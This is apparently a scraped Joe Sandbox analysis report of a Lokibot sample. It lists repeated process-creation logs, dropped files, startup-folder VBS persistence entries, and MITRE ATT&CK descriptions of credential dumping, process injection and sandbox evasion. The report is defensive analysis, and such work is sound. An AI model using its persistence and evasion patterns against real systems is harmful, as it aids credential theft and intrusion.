Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\Desktop\9876567899.bat.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\Desktop\9876567899.bat.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\9876567899.bat.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Users\user\AppData\Roaming\Dhy2kmz.exe "C:\Users\user\AppData\Roaming\Dhy2kmz.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exe	Process created: C:\Users\user\AppData\Roaming\Dhy2kmz.exe "C:\Users\user\AppData\Roaming\Dhy2kmz.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: C:\Users\user\AppData\Local\preinhered\palladiums.exe "C:\Users\user\AppData\Local\preinhered\palladiums.exe"
Source: C:\Users\user\AppData\Local\preinhered\palladiums.exe	Process created: unknown unknown

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9876567899.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\JOHP[1].exe

C:\Users\user\AppData\Local\Temp\shrugged

C:\Users\user\AppData\Local\preinhered\palladiums.exe

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Dhy2kmz.exe

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wnuth.vbs

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\palladiums.vbs

C:\Users\user\AppData\Roaming\Wnuth.exe

Static File Info

Windows Analysis Report
9876567899.bat.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre